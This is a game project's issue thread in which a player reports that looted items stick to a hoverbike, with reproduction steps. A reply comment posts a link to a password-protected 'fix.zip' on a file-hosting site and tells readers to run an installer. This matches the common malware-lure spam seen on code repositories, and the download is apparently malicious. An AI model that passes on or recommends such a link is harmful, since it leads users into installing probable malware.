### ISSUE TITLE
Hoverbike item storage glitch

### ISSUE THREAD

**Issue by GrimsyArcum** [new-frontiers-14/frontier-station-14#1910]
## Description
Playing as a wheelchair-bound character, I was looting dungeon mobs while riding a hoverbike. The items would stick to the hoverbike if from lootbox containers (punk's bags, etc).
**Reproduction**
1. Get a hoverbike
2. Go on expedition with punks, cultists, explorers, salvagers, syndies, etc (any humanoid one)
3. Kill a humanoid
4. Loot the body and open the bag while on the bike.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
